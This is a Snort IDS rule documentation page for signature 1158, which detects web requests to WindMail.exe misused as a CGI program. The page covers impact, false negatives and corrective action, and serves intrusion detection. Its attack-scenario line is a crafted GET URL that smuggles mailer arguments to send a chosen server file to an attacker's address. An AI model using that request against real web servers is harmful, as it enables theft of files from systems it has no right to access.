File: 1158.txt

package info (click to toggle)
snort 2.7.0-20.4
  • links: PTS
  • area: main
  • in suites: lenny
  • size: 34,512 kB
  • ctags: 18,772
  • sloc: ansic: 115,404; sh: 10,893; makefile: 1,372; perl: 487; sql: 213
file content (69 lines) | stat: -rw-r--r-- 1,683 bytes parent folder | download | duplicates (6)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
Rule:  

--

Sid:
1158

--

Summary:
This event is generated when an attempt is made to access the executable
file WindMail.exe using a web connection.

--
Impact:
Remote attackers could subvert the WindMail mailer to read or execute
arbitrary files on the web server

--
Detailed Information:
WindMail is a commandline mail program for Windows.  It is sometimes
deployed for scripting or for sending email through a web application.
Some windmail deployments make webmail.exe a CGI application, which it was
not designed to do.  The result is that an attacker could read or
execute arbitrary files on the system that the web server has access to.
It should never be a CGI application itself, and instead should be called
by another program that properly filters input.

--
Affected Systems:
	All systems using windmail.exe

--
Attack Scenarios:
http://target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address

--
Ease of Attack:
Simple crafting of a web GET request

--
False Positives:
None Known

--
False Negatives:
If a CGI script calls windmail.exe, but windmail.exe itself is not a CGI
application, then this rule will not generate an event. If the CGI
application does not properly filter input, there is a possibility
that the attack could still succeed.

--
Corrective Action:
Look at the packet to determine whether a request was made via an HTTP GET
for the windmail.exe application. If so, determine whether the attacked
web server had windmail.exe on it.

--
Contributors:
Original rule writer unknown
Original document author unkown
Sourcefire Vulnerability Research Team
Nigel Houghton <nigel.houghton@sourcefire.com>

--
Additional References:


--